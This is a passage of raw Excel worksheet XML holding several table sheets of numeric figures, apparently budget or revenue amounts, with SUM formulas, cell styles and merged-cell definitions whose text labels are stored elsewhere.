        <v>98</v>
      </c>
    </row>
    <row r="58" spans="2:3" ht="15.75">
      <c r="B58" s="640" t="s">
        <v>99</v>
      </c>
      <c r="C58" s="642" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="59" spans="2:3" ht="15.75">
      <c r="B59" s="640" t="s">
        <v>101</v>
      </c>
      <c r="C59" s="642" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="60" spans="2:3" ht="15.75">
      <c r="B60" s="640" t="s">
        <v>103</v>
      </c>
      <c r="C60" s="642" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="61" spans="2:3" ht="15.75">
      <c r="B61" s="640" t="s">
        <v>105</v>
      </c>
      <c r="C61" s="642" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="62" spans="2:3" ht="15.75">
      <c r="B62" s="640" t="s">
        <v>107</v>
      </c>
      <c r="C62" s="642" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="63" spans="2:3">
      <c r="B63" s="640" t="s">
        <v>109</v>
      </c>
      <c r="C63" s="641" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="64" spans="2:3">
      <c r="B64" s="640" t="s">
        <v>111</v>
      </c>
      <c r="C64" s="641" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="65" spans="2:3">
      <c r="B65" s="640" t="s">
        <v>113</v>
      </c>
      <c r="C65" s="641" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="66" spans="2:3">
      <c r="B66" s="640" t="s">
        <v>115</v>
      </c>
      <c r="C66" s="641" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="67" spans="2:3">
      <c r="B67" s="640" t="s">
        <v>117</v>
      </c>
      <c r="C67" s="641" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="68" spans="2:3" ht="15.75">
      <c r="B68" s="640" t="s">
        <v>118</v>
      </c>
      <c r="C68" s="642" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="69" spans="2:3" ht="15.75">
      <c r="B69" s="640" t="s">
        <v>120</v>
      </c>
      <c r="C69" s="642" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="70" spans="2:3" ht="15.75">
      <c r="B70" s="640" t="s">
        <v>122</v>
      </c>
      <c r="C70" s="642" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="71" spans="2:3" ht="15.75">
      <c r="B71" s="640" t="s">
        <v>124</v>
      </c>
      <c r="C71" s="642" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="72" spans="2:3" ht="15.75">
      <c r="B72" s="640" t="s">
        <v>126</v>
      </c>
      <c r="C72" s="642" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="73" spans="2:3" ht="15.75">
      <c r="B73" s="640" t="s">
        <v>128</v>
      </c>
      <c r="C73" s="642" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="74" spans="2:3">
      <c r="B74" s="640" t="s">
        <v>130</v>
      </c>
      <c r="C74" s="641" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="75" spans="2:3" ht="15.75">
      <c r="B75" s="640" t="s">
        <v>132</v>
      </c>
      <c r="C75" s="642" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="76" spans="2:3" ht="15.75">
      <c r="B76" s="640" t="s">
        <v>134</v>
      </c>
      <c r="C76" s="642" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="77" spans="2:3">
      <c r="B77" s="640" t="s">
        <v>136</v>
      </c>
      <c r="C77" s="641" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="78" spans="2:3" ht="15.75">
      <c r="B78" s="640" t="s">
        <v>138</v>
      </c>
      <c r="C78" s="642" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="79" spans="2:3" ht="15.75">
      <c r="B79" s="640" t="s">
        <v>139</v>
      </c>
      <c r="C79" s="642" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="80" spans="2:3">
      <c r="B80" s="640" t="s">
        <v>140</v>
      </c>
      <c r="C80" s="641" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="81" spans="2:3" ht="15.75">
      <c r="B81" s="640" t="s">
        <v>142</v>
      </c>
      <c r="C81" s="642" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="82" spans="2:3">
      <c r="B82" s="640" t="s">
        <v>144</v>
      </c>
      <c r="C82" s="641" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="83" spans="2:3">
      <c r="B83" s="640" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="84" spans="2:3">
      <c r="B84" s="640" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="85" spans="2:3">
      <c r="B85" s="640" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="86" spans="2:3">
      <c r="B86" s="640" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="87" spans="2:3">
      <c r="B87" s="640" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="88" spans="2:3">
      <c r="B88" s="640" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="89" spans="2:3">
      <c r="B89" s="640" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="90" spans="2:3">
      <c r="B90" s="640" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="91" spans="2:3">
      <c r="B91" s="640" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="92" spans="2:3">
      <c r="B92" s="640" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="93" spans="2:3">
      <c r="B93" s="640" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="94" spans="2:3">
      <c r="B94" s="640" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="95" spans="2:3">
      <c r="B95" s="640" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="96" spans="2:3">
      <c r="B96" s="640" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="97" spans="2:2">
      <c r="B97" s="640" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="98" spans="2:2">
      <c r="B98" s="640" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="99" spans="2:2">
      <c r="B99" s="640" t="s">
        <v>162</v>
      </c>
    </row>
    <row r="100" spans="2:2">
      <c r="B100" s="640" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="101" spans="2:2">
      <c r="B101" s="640" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="102" spans="2:2">
      <c r="B102" s="640" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="103" spans="2:2">
      <c r="B103" s="640" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="104" spans="2:2">
      <c r="B104" s="640" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="105" spans="2:2">
      <c r="B105" s="640" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="106" spans="2:2">
      <c r="B106" s="640" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="107" spans="2:2">
      <c r="B107" s="640" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="108" spans="2:2">
      <c r="B108" s="640" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="109" spans="2:2">
      <c r="B109" s="640" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="110" spans="2:2">
      <c r="B110" s="640" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="111" spans="2:2">
      <c r="B111" s="640" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="112" spans="2:2">
      <c r="B112" s="640" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="113" spans="2:2">
      <c r="B113" s="640" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="114" spans="2:2">
      <c r="B114" s="640" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="115" spans="2:2">
      <c r="B115" s="640" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="116" spans="2:2">
      <c r="B116" s="640" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="117" spans="2:2">
      <c r="B117" s="640" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="118" spans="2:2">
      <c r="B118" s="640" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="119" spans="2:2">
      <c r="B119" s="640" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="120" spans="2:2">
      <c r="B120" s="640" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="121" spans="2:2">
      <c r="B121" s="640" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="122" spans="2:2">
      <c r="B122" s="640" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="123" spans="2:2">
      <c r="B123" s="640" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="124" spans="2:2">
      <c r="B124" s="640" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="125" spans="2:2">
      <c r="B125" s="640" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="126" spans="2:2">
      <c r="B126" s="640" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="127" spans="2:2">
      <c r="B127" s="640" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="128" spans="2:2">
      <c r="B128" s="640" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="129" spans="2:2">
      <c r="B129" s="640" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="130" spans="2:2">
      <c r="B130" s="640" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="131" spans="2:2">
      <c r="B131" s="640" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="132" spans="2:2">
      <c r="B132" s="640" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="133" spans="2:2">
      <c r="B133" s="640" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="134" spans="2:2">
      <c r="B134" s="640" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="135" spans="2:2">
      <c r="B135" s="640" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="136" spans="2:2">
      <c r="B136" s="640" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="137" spans="2:2">
      <c r="B137" s="640" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="138" spans="2:2">
      <c r="B138" s="640" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="139" spans="2:2">
      <c r="B139" s="640" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="140" spans="2:2">
      <c r="B140" s="640" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="141" spans="2:2">
      <c r="B141" s="640" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="142" spans="2:2">
      <c r="B142" s="640" t="s">
        <v>205</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="54" type="noConversion"/>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6"/>
  <sheetViews>
    <sheetView zoomScale="98" zoomScaleNormal="98" workbookViewId="0">
      <selection activeCell="L5" sqref="L5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="2" width="5.85546875" style="310" customWidth="1"/>
    <col min="3" max="17" width="5.42578125" style="310" customWidth="1"/>
    <col min="18" max="16364" width="10" style="310"/>
    <col min="16365" max="16381" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:17" s="305" customFormat="1" ht="21.95" customHeight="1">
      <c r="A1" s="655" t="s">
        <v>405</v>
      </c>
      <c r="B1" s="656"/>
      <c r="C1" s="313"/>
      <c r="D1" s="313"/>
      <c r="E1" s="313"/>
      <c r="F1" s="313"/>
      <c r="G1" s="313"/>
      <c r="H1" s="313"/>
      <c r="I1" s="313"/>
      <c r="J1" s="313"/>
    </row>
    <row r="2" spans="1:17" s="306" customFormat="1" ht="27" customHeight="1">
      <c r="A2" s="652" t="s">
        <v>406</v>
      </c>
      <c r="B2" s="652"/>
      <c r="C2" s="652"/>
      <c r="D2" s="652"/>
      <c r="E2" s="652"/>
      <c r="F2" s="652"/>
      <c r="G2" s="652"/>
      <c r="H2" s="652"/>
      <c r="I2" s="652"/>
      <c r="J2" s="652"/>
      <c r="K2" s="652"/>
      <c r="L2" s="652"/>
      <c r="M2" s="652"/>
      <c r="N2" s="652"/>
      <c r="O2" s="652"/>
      <c r="P2" s="652"/>
      <c r="Q2" s="652"/>
    </row>
    <row r="3" spans="1:17" s="307" customFormat="1" ht="27.95" customHeight="1">
      <c r="A3" s="660" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="660"/>
      <c r="C3" s="660"/>
      <c r="D3" s="660"/>
      <c r="E3" s="660"/>
      <c r="F3" s="660"/>
      <c r="G3" s="660"/>
      <c r="H3" s="660"/>
      <c r="I3" s="660"/>
      <c r="J3" s="660"/>
      <c r="K3" s="660"/>
      <c r="L3" s="660"/>
      <c r="M3" s="660"/>
      <c r="N3" s="660"/>
      <c r="O3" s="660"/>
      <c r="P3" s="660"/>
      <c r="Q3" s="660"/>
    </row>
    <row r="4" spans="1:17" s="308" customFormat="1" ht="104.25" customHeight="1">
      <c r="A4" s="584" t="s">
        <v>407</v>
      </c>
      <c r="B4" s="585" t="s">
        <v>408</v>
      </c>
      <c r="C4" s="586" t="s">
        <v>409</v>
      </c>
      <c r="D4" s="586" t="s">
        <v>410</v>
      </c>
      <c r="E4" s="586" t="s">
        <v>411</v>
      </c>
      <c r="F4" s="586" t="s">
        <v>412</v>
      </c>
      <c r="G4" s="586" t="s">
        <v>413</v>
      </c>
      <c r="H4" s="586" t="s">
        <v>414</v>
      </c>
      <c r="I4" s="586" t="s">
        <v>415</v>
      </c>
      <c r="J4" s="586" t="s">
        <v>416</v>
      </c>
      <c r="K4" s="588" t="s">
        <v>417</v>
      </c>
      <c r="L4" s="588" t="s">
        <v>418</v>
      </c>
      <c r="M4" s="588" t="s">
        <v>419</v>
      </c>
      <c r="N4" s="588" t="s">
        <v>420</v>
      </c>
      <c r="O4" s="588" t="s">
        <v>421</v>
      </c>
      <c r="P4" s="588" t="s">
        <v>422</v>
      </c>
      <c r="Q4" s="588" t="s">
        <v>423</v>
      </c>
    </row>
    <row r="5" spans="1:17" s="583" customFormat="1" ht="99" customHeight="1">
      <c r="A5" s="315" t="s">
        <v>390</v>
      </c>
      <c r="B5" s="587"/>
      <c r="C5" s="587"/>
      <c r="D5" s="587"/>
      <c r="E5" s="587"/>
      <c r="F5" s="587"/>
      <c r="G5" s="587"/>
      <c r="H5" s="587"/>
      <c r="I5" s="587"/>
      <c r="J5" s="587"/>
      <c r="K5" s="587"/>
      <c r="L5" s="587"/>
      <c r="M5" s="587"/>
      <c r="N5" s="587"/>
      <c r="O5" s="587"/>
      <c r="P5" s="587"/>
      <c r="Q5" s="589"/>
    </row>
    <row r="6" spans="1:17" ht="28.5" customHeight="1">
      <c r="A6" s="654" t="s">
        <v>404</v>
      </c>
      <c r="B6" s="654"/>
      <c r="C6" s="654"/>
      <c r="D6" s="654"/>
      <c r="E6" s="654"/>
      <c r="F6" s="654"/>
      <c r="G6" s="654"/>
      <c r="H6" s="654"/>
      <c r="I6" s="654"/>
      <c r="J6" s="654"/>
      <c r="K6" s="654"/>
      <c r="L6" s="654"/>
      <c r="M6" s="654"/>
      <c r="N6" s="654"/>
      <c r="O6" s="654"/>
      <c r="P6" s="654"/>
      <c r="Q6" s="654"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="A2:Q2"/>
    <mergeCell ref="A3:Q3"/>
    <mergeCell ref="A6:Q6"/>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87" zoomScaleNormal="87" workbookViewId="0">
      <selection activeCell="E15" sqref="E15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.42578125" defaultRowHeight="12"/>
  <cols>
    <col min="1" max="1" width="9.140625" style="476" customWidth="1"/>
    <col min="2" max="2" width="47.140625" style="474" customWidth="1"/>
    <col min="3" max="4" width="18.140625" style="477" customWidth="1"/>
    <col min="5" max="16384" width="9.42578125" style="477"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" ht="21" customHeight="1">
      <c r="A1" s="664" t="s">
        <v>424</v>
      </c>
      <c r="B1" s="664"/>
      <c r="C1" s="664"/>
      <c r="D1" s="581"/>
    </row>
    <row r="2" spans="1:4" ht="27.95" customHeight="1">
      <c r="A2" s="665" t="s">
        <v>425</v>
      </c>
      <c r="B2" s="665"/>
      <c r="C2" s="665"/>
      <c r="D2" s="665"/>
    </row>
    <row r="3" spans="1:4" ht="21" customHeight="1">
      <c r="A3" s="666" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="666"/>
      <c r="C3" s="666"/>
      <c r="D3" s="666"/>
    </row>
    <row r="4" spans="1:4" s="474" customFormat="1" ht="32.25" customHeight="1">
      <c r="A4" s="350" t="s">
        <v>426</v>
      </c>
      <c r="B4" s="350" t="s">
        <v>427</v>
      </c>
      <c r="C4" s="350" t="s">
        <v>428</v>
      </c>
      <c r="D4" s="350" t="s">
        <v>429</v>
      </c>
    </row>
    <row r="5" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A5" s="667" t="s">
        <v>383</v>
      </c>
      <c r="B5" s="668"/>
      <c r="C5" s="481">
        <f>C6+C8+C12+C15+C21</f>
        <v>15950</v>
      </c>
      <c r="D5" s="481">
        <f>D6+D8+D12+D15+D21</f>
        <v>14591</v>
      </c>
    </row>
    <row r="6" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A6" s="669" t="s">
        <v>430</v>
      </c>
      <c r="B6" s="669"/>
      <c r="C6" s="481">
        <f>SUM(C7:C7)</f>
        <v>692</v>
      </c>
      <c r="D6" s="481">
        <f>SUM(D7:D7)</f>
        <v>680</v>
      </c>
    </row>
    <row r="7" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A7" s="482">
        <v>1</v>
      </c>
      <c r="B7" s="483" t="s">
        <v>431</v>
      </c>
      <c r="C7" s="482">
        <v>692</v>
      </c>
      <c r="D7" s="582">
        <v>680</v>
      </c>
    </row>
    <row r="8" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A8" s="661" t="s">
        <v>432</v>
      </c>
      <c r="B8" s="662"/>
      <c r="C8" s="481">
        <f>SUM(C9:C11)</f>
        <v>4950</v>
      </c>
      <c r="D8" s="481">
        <f>SUM(D9:D11)</f>
        <v>4337</v>
      </c>
    </row>
    <row r="9" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A9" s="482">
        <v>1</v>
      </c>
      <c r="B9" s="484" t="s">
        <v>433</v>
      </c>
      <c r="C9" s="482">
        <v>1450</v>
      </c>
      <c r="D9" s="482">
        <v>1368</v>
      </c>
    </row>
    <row r="10" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A10" s="482">
        <v>2</v>
      </c>
      <c r="B10" s="484" t="s">
        <v>434</v>
      </c>
      <c r="C10" s="482">
        <v>2000</v>
      </c>
      <c r="D10" s="482">
        <v>1900</v>
      </c>
    </row>
    <row r="11" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A11" s="482">
        <v>3</v>
      </c>
      <c r="B11" s="484" t="s">
        <v>435</v>
      </c>
      <c r="C11" s="482">
        <v>1500</v>
      </c>
      <c r="D11" s="482">
        <v>1069</v>
      </c>
    </row>
    <row r="12" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A12" s="663" t="s">
        <v>436</v>
      </c>
      <c r="B12" s="662"/>
      <c r="C12" s="481">
        <f>SUM(C13:C14)</f>
        <v>2326</v>
      </c>
      <c r="D12" s="481">
        <f>SUM(D13:D14)</f>
        <v>2330</v>
      </c>
    </row>
    <row r="13" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A13" s="482">
        <v>1</v>
      </c>
      <c r="B13" s="484" t="s">
        <v>437</v>
      </c>
      <c r="C13" s="482">
        <v>1226</v>
      </c>
      <c r="D13" s="482">
        <v>1280</v>
      </c>
    </row>
    <row r="14" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A14" s="482">
        <v>2</v>
      </c>
      <c r="B14" s="484" t="s">
        <v>438</v>
      </c>
      <c r="C14" s="482">
        <v>1100</v>
      </c>
      <c r="D14" s="482">
        <v>1050</v>
      </c>
    </row>
    <row r="15" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A15" s="663" t="s">
        <v>439</v>
      </c>
      <c r="B15" s="662"/>
      <c r="C15" s="481">
        <f>SUM(C16:C20)</f>
        <v>6393</v>
      </c>
      <c r="D15" s="481">
        <f>SUM(D16:D20)</f>
        <v>6146</v>
      </c>
    </row>
    <row r="16" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A16" s="482">
        <v>1</v>
      </c>
      <c r="B16" s="484" t="s">
        <v>440</v>
      </c>
      <c r="C16" s="482">
        <v>1113</v>
      </c>
      <c r="D16" s="482">
        <v>1101</v>
      </c>
    </row>
    <row r="17" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A17" s="482">
        <v>2</v>
      </c>
      <c r="B17" s="484" t="s">
        <v>441</v>
      </c>
      <c r="C17" s="482">
        <v>980</v>
      </c>
      <c r="D17" s="482">
        <v>976</v>
      </c>
    </row>
    <row r="18" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A18" s="482">
        <v>3</v>
      </c>
      <c r="B18" s="484" t="s">
        <v>442</v>
      </c>
      <c r="C18" s="482">
        <v>1000</v>
      </c>
      <c r="D18" s="482">
        <v>1000</v>
      </c>
    </row>
    <row r="19" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A19" s="482">
        <v>4</v>
      </c>
      <c r="B19" s="484" t="s">
        <v>443</v>
      </c>
      <c r="C19" s="482">
        <v>2400</v>
      </c>
      <c r="D19" s="482">
        <v>2321</v>
      </c>
    </row>
    <row r="20" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A20" s="482">
        <v>5</v>
      </c>
      <c r="B20" s="484" t="s">
        <v>444</v>
      </c>
      <c r="C20" s="482">
        <v>900</v>
      </c>
      <c r="D20" s="482">
        <v>748</v>
      </c>
    </row>
    <row r="21" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A21" s="663" t="s">
        <v>445</v>
      </c>
      <c r="B21" s="662"/>
      <c r="C21" s="481">
        <f>SUM(C22:C22)</f>
        <v>1589</v>
      </c>
      <c r="D21" s="481">
        <f>SUM(D22:D22)</f>
        <v>1098</v>
      </c>
    </row>
    <row r="22" spans="1:4" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A22" s="482">
        <v>1</v>
      </c>
      <c r="B22" s="484" t="s">
        <v>446</v>
      </c>
      <c r="C22" s="482">
        <v>1589</v>
      </c>
      <c r="D22" s="482">
        <v>1098</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="A8:B8"/>
    <mergeCell ref="A12:B12"/>
    <mergeCell ref="A15:B15"/>
    <mergeCell ref="A21:B21"/>
    <mergeCell ref="A1:C1"/>
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="A3:D3"/>
    <mergeCell ref="A5:B5"/>
    <mergeCell ref="A6:B6"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39305555555555599" right="0.39305555555555599" top="0.39305555555555599" bottom="0.39305555555555599" header="0.5" footer="0.5"/>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zoomScale="87" zoomScaleNormal="87" workbookViewId="0">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="D35" sqref="D35"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.28515625" defaultRowHeight="21" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="48.5703125" style="546" customWidth="1"/>
    <col min="2" max="2" width="23.42578125" style="546" customWidth="1"/>
    <col min="3" max="3" width="18.85546875" style="549" customWidth="1"/>
    <col min="4" max="16384" width="10.28515625" style="546"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="24" customHeight="1">
      <c r="A1" s="548" t="s">
        <v>447</v>
      </c>
      <c r="B1" s="548"/>
    </row>
    <row r="2" spans="1:3" s="541" customFormat="1" ht="24.95" customHeight="1">
      <c r="A2" s="670" t="s">
        <v>448</v>
      </c>
      <c r="B2" s="670"/>
      <c r="C2" s="670"/>
    </row>
    <row r="3" spans="1:3" s="542" customFormat="1" ht="24.95" customHeight="1">
      <c r="B3" s="550"/>
      <c r="C3" s="551" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="4" spans="1:3" s="543" customFormat="1" ht="21" customHeight="1">
      <c r="A4" s="444" t="s">
        <v>344</v>
      </c>
      <c r="B4" s="444" t="s">
        <v>429</v>
      </c>
      <c r="C4" s="553" t="s">
        <v>449</v>
      </c>
    </row>
    <row r="5" spans="1:3" s="567" customFormat="1" ht="21" customHeight="1">
      <c r="A5" s="557" t="s">
        <v>276</v>
      </c>
      <c r="B5" s="569">
        <f>SUM(B6:B19)</f>
        <v>205089</v>
      </c>
      <c r="C5" s="569">
        <f>SUM(C6:C19)</f>
        <v>195800</v>
      </c>
    </row>
    <row r="6" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A6" s="570" t="s">
        <v>277</v>
      </c>
      <c r="B6" s="571">
        <v>53720</v>
      </c>
      <c r="C6" s="571">
        <v>51000</v>
      </c>
    </row>
    <row r="7" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A7" s="570" t="s">
        <v>278</v>
      </c>
      <c r="B7" s="571">
        <v>42673</v>
      </c>
      <c r="C7" s="571">
        <v>42103</v>
      </c>
    </row>
    <row r="8" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A8" s="570" t="s">
        <v>279</v>
      </c>
      <c r="B8" s="571">
        <v>7400</v>
      </c>
      <c r="C8" s="571">
        <v>7400</v>
      </c>
    </row>
    <row r="9" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A9" s="570" t="s">
        <v>280</v>
      </c>
      <c r="B9" s="571">
        <v>364</v>
      </c>
      <c r="C9" s="571">
        <v>365</v>
      </c>
    </row>
    <row r="10" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A10" s="570" t="s">
        <v>281</v>
      </c>
      <c r="B10" s="571">
        <v>9200</v>
      </c>
      <c r="C10" s="571">
        <v>9250</v>
      </c>
    </row>
    <row r="11" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A11" s="570" t="s">
        <v>282</v>
      </c>
      <c r="B11" s="571">
        <v>12734</v>
      </c>
      <c r="C11" s="571">
        <v>11000</v>
      </c>
    </row>
    <row r="12" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A12" s="570" t="s">
        <v>283</v>
      </c>
      <c r="B12" s="571">
        <v>4649</v>
      </c>
      <c r="C12" s="571">
        <v>4650</v>
      </c>
    </row>
    <row r="13" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A13" s="570" t="s">
        <v>284</v>
      </c>
      <c r="B13" s="571">
        <v>14577</v>
      </c>
      <c r="C13" s="571">
        <v>13000</v>
      </c>
    </row>
    <row r="14" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A14" s="570" t="s">
        <v>285</v>
      </c>
      <c r="B14" s="571">
        <v>23745</v>
      </c>
      <c r="C14" s="571">
        <v>22800</v>
      </c>
    </row>
    <row r="15" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A15" s="570" t="s">
        <v>286</v>
      </c>
      <c r="B15" s="571">
        <v>5158</v>
      </c>
      <c r="C15" s="571">
        <v>5160</v>
      </c>
    </row>
    <row r="16" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A16" s="570" t="s">
        <v>287</v>
      </c>
      <c r="B16" s="571">
        <v>6078</v>
      </c>
      <c r="C16" s="571">
        <v>6080</v>
      </c>
    </row>
    <row r="17" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A17" s="570" t="s">
        <v>288</v>
      </c>
      <c r="B17" s="571">
        <v>23795</v>
      </c>
      <c r="C17" s="571">
        <v>22000</v>
      </c>
    </row>
    <row r="18" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A18" s="570" t="s">
        <v>289</v>
      </c>
      <c r="B18" s="571">
        <v>991</v>
      </c>
      <c r="C18" s="571">
        <v>992</v>
      </c>
    </row>
    <row r="19" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A19" s="570" t="s">
        <v>290</v>
      </c>
      <c r="B19" s="571">
        <v>5</v>
      </c>
      <c r="C19" s="571"/>
    </row>
    <row r="20" spans="1:3" s="567" customFormat="1" ht="21" customHeight="1">
      <c r="A20" s="557" t="s">
        <v>291</v>
      </c>
      <c r="B20" s="569">
        <f>SUM(B21:B27)</f>
        <v>9518</v>
      </c>
      <c r="C20" s="569">
        <f>SUM(C21:C27)</f>
        <v>19200</v>
      </c>
    </row>
    <row r="21" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A21" s="570" t="s">
        <v>292</v>
      </c>
      <c r="B21" s="571">
        <v>8000</v>
      </c>
      <c r="C21" s="571">
        <v>8200</v>
      </c>
    </row>
    <row r="22" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A22" s="570" t="s">
        <v>293</v>
      </c>
      <c r="B22" s="571">
        <v>384</v>
      </c>
      <c r="C22" s="571">
        <v>5300</v>
      </c>
    </row>
    <row r="23" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A23" s="570" t="s">
        <v>294</v>
      </c>
      <c r="B23" s="571">
        <v>200</v>
      </c>
      <c r="C23" s="571">
        <v>1800</v>
      </c>
    </row>
